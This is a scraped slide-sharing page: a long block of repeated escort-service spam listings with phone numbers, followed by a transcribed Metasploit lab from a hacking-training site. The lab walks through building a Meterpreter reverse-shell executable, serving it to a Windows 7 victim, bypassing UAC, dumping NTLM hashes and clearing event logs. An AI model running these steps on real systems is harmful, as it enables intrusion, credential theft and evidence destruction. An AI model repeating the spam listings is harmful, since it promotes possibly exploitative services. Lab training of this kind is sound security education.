Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
 
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
 
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls KolkataLow Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
Low Rate Call Girls Kolkata Avani 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
 

Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit

  • 1. 1 WWW.Prohackers.in Lab-4 “Privileges Esclation by Exploiting Client Side Vulnerabilities using Metasploit” By: -Vishal Kumar (CEH, CHFI, CISE, MCP) info@prohackers.in
  • 2. 2 WWW.Prohackers.in Table of content 1. Lab Scenario 2. Lab Objective 3. Overview of Lab 4. Lab Tasks 3.1 Task 01 :- Start postgresql and metasploit services 3.2 Task 02 : - Share Exploit.exe file 3.3 Task 03 : - Perform Exploitation 3.4 Task 04 : - Run the Exploit 3.4 Task 05 : - Establish a session
  • 3. 3 WWW.Prohackers.in Task 01:- Start postgresql and metasploit services.
  • 4. 4 WWW.Prohackers.in Note:- before performing this lab, log in to Kali-Linux virtual machine, click places → Computer. Navigate to File System → etc → apache2, open apache2.conf, enter the command servername localhost in a new line and save the file.  Launch window 7 and login to its administrator account.  Switch to Kali-Linux virtual machine and log in to it. Launch a command terminal, and type the command service postgresql start and press Enter. Now, type the other command service metasploit start and press Enter.  ype the command msfconsole and press Enter to launch msfconsole.  Type the command msfpayload windows/meterpreter/reverse_tcp LHOST=(IP of Kali-Linux) X > Desktop/Exploit.exe in msfconsole, and press Enter.
  • 5. 5 WWW.Prohackers.in Tip: - Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The above command will create a Windows executable file named “Exploit.exe” and will be saved in Kali-Linux Desktop. Task 02:- Share Exploit.exe file.
  • 6. 6 WWW.Prohackers.in  Now you need to share Exploit.exe with the victim machine (in this lab we are using Windows 7 virtual machine as a victim machine). Open a new command line terminal, type the command mkdir /var/www/share and press Enter to create a new directory named Share. Tip: - To create a new directory share in www folder, following command is used: mkdir /var/www/share.  Change the mode of the share folder to 755 by typing the command chmode -R 755 /var/www/share and press Enter Tip: - To change the mode of a share directory/folder, use the following command: chmode -R 755 /var/www/share/.  Change the ownership of that folder to www-data, by typing the command chown - R www-data:www-data /var/www/share/ and press Enter. Tip: - To change the ownership of folder into www, use the following command: chown -R www-data /var/www/share/.  Type the command ls -la /var/www/ | grep share and press Enter
  • 7. 7 WWW.Prohackers.in  The next step is to start the apache server. Type the command service apache2 start in terminal and press Enter.  Now, that the apache web server is running, copy Exploit.exe into the share folder. Type the command cp /root/Desktop/Exploit.exe /var/www/share/ in the terminal, and press Enter Note:- To run the apache web server, use the following command: cp/root/.msf4/data/exploits/*/var/www/share/. Task 03:- Perform Exploitation.  Switch back to msfconsole terminal to create a handler. Type use exploit/multi/handler and press Enter, to handle exploits launched outside the framework.  Now, issue the following commands: o Type set payload windows/meterpreter/reverse_tcp and press Enter. Type set LHOST x.x.x.x (Kali-Linux IP address) and press Enter.
  • 8. 8 WWW.Prohackers.in  To start handler type the command: exploit -j -z and press Enter. Task 04:- Run the Exploit.  Now, switch to windows 7 virtual machine.  Launch web browser, and type the URL http://192.168.121.129/share/ in the address bar and press Enter  You will be redirected to the apache index webpage. Click Exploit.exe link to download the backdoor file  The opening Exploit.exe pop-up appears, click Save File.  On completion of the download, a download notification appears in the browser. Click the Open Containing Folder icon. Tip:- To interact with the available session, you can use session -i <session_ID>.
  • 9. 9 WWW.Prohackers.in  Double-click Exploit.exe. If an open file - security warning appears, click Run.  Switch back to Kali-Linux machine. Meterpreter session has been successfully opened, as shown in the following screenshot. Task 05:- Establish a session. Type session -i 1 and press Enter. (1 in session -i 1 command is the ID number of the session ). Meterpreter shell is launched, as shown in the following screenshot.  Type getuid and press Enter. This displays the current user ID, as shown in the screenshot
  • 10. 10 WWW.Prohackers.in  You will observe that the Meterpreter server is running with normal user privileges.  You will not be able to execute the commands (such as run hashdump, which dumps the user account hashes located in the SAM file; clearev, which clear the event logs remotely; etc.) that require administrative. Root privileges.  Let us check this by using run hashdump command.  The command fails to dump the hashes from the SAM file located in the windows 7 and returns an error stating that access is denied.  From this, it is evident that Meterpreter server requires admin privileges to perform such actions.  Now, we shall try to escalate the privileges by issuing getsystem command that attempts to elevate the user privileges.  The command issued is: o Getsystem -t 1: which use the Service - Named Pipe Impersonation (In Memory/Admin) Technique?  The command fails to escalate privileges and return an error stating Access is Denied.
  • 11. 11 WWW.Prohackers.in  From the above result, it is evident that the security configuration of the Windows 7 machine is blocking you from gaining unrestricted access to it.  Now, we shall try to bypass the user account control setting that is blocking you. You will now: o Background the current meterpreter session, o Use the bypassuac exploit for windows, o Set meterpreter/reverse_tcp payload, o Configure the exploit and payload, o Exploit the machine using the above configuration payload in attempt to elevate the privileges.  Type background and press Enter. This command background the current meterpreter session  Type use exploit/windows/local/bypassuac and press Enter. Here you need to configure the exploit. To know what all options you need to configuration in the exploit, type show options and press Enter  The Module options section appears, displaying the requirements for the exploit. You will observe that:
  • 12. 12 WWW.Prohackers.in o The SESSION option is required, but the current setting is empty. Here, you need to set the current meterpreter session that is obtained during the exploiting (i.e session 1). o The TECHNIQUE option is required, but the current setting is already set to EXE, so ignore this option.  Type set SESSION 1 (1 is the current meterpreter session which was backgrounded in this lab) and press Enter  Now, that we have configured the exploit, our next step will be to set a payload and configure it.  Type set payload windows/meterpreter/reverse_tcp and press Enter, to set the meterpreter/reverse_tcp payload.  The next step is to configure this payload. To know all the options you need to configure in the exploit, type show options and press Enter.
  • 13. 13 WWW.Prohackers.in  The Module options section appears, displaying the requirements for the exploit. You will observe that: o The SESSION option is required, but the current setting is empty. Here, you need to set the current meterpreter session that is obtained during the exploiting (i.e session 1). o The TECHNIQUE option is required, but the current setting is already set to EXE, so ignore this option.  Type set SESSION 1 (1 is the current meterpreter session which was backgrounded in this lab) and press Enter
  • 14. 14 WWW.Prohackers.in  Now, that we have configured the exploit, our next step will be to set a payload and configure it.  Type set payload windows/meterpreter/reverse_tcp and press Enter, to set the meterpreter/reverse_tcp payload.  The next step is to configure this payload. To know all the options you need to configure in the exploit, type show options and press Enter
  • 15. 15 WWW.Prohackers.in  The Module options section appears, displaying the previously configured exploit. Here you can observe that the session value is set.  The Payload options sections displays the requirement for the payload. Observe that: o LHOST option is required, but the current setting is empty, here you need to set the IP address of the local host i.e. Kali-Linux ip address. o EXITFUNC option is required but the current setting is already set to precess, so ignore this options. o LPORT option is required, but the current setting is already set to port number 4444, so ignore this option.  To set the LHOST option, type set LHOST 192.168.121.129 and press Enter.  You have successfully configured the exploit and payload. Type exploit and press Enter. This begins to exploit the UAC settings in windows 7 machine.  As you can see, BypassUAC exploit has successfully bypass the UAC settings on windows 7 machine; you have now successfully attained a meterpreter session.  Now, let us check the current User ID statue of meterpreter. You will observe that Meterpreter server is still running with normal user privileges. Type getuid and press Enter.
  • 16. 16 WWW.Prohackers.in  Let us check if we have successfully attained the SYSTEM/admin privileges by issuing a meterpreter command that require these privileges in order to be executed.  For instance, we shall try to obtain hashes located in SAM file of windows 7. Type the command run hashdump and press Enter, this time meterpreter successfully extracted the NTLM hashes and display them as shown in the following screenshot.  Thus you have successfully escalate the privileges by exploiting windows 7 machine’s vulnerability.  You can now execute commands (clearev, which clears the event logs remotely, etc) that require administrative/ root privileges
  • 17. 17 WWW.Prohackers.in Tool/Utility Information Collected/Objectives Achieved Metasploit Framework Console (msfconsole) IP Address Range/target:- Windows 7 machine Scan Result:-  Hacking windows 7.  Escalating the privileges.  Extracting the NTLM Hashes from the SAM file.  Clear the event log. Thanks for reading this presentation Please give us your feedback at info@prohackers.in Your feedback is most valuable for us for improving the presentation You can also suggest the topic on which you want the presentation Website: www.prohackers.in FB page: www.facebook.com/theprohackers2017 Join FB Group: www.facebook.com/groups/group.prohackers/ Watch us on: www.youtube.com//channel/UCcyYSi1sh1SmyMlGfB-Vq6A ***Thanks***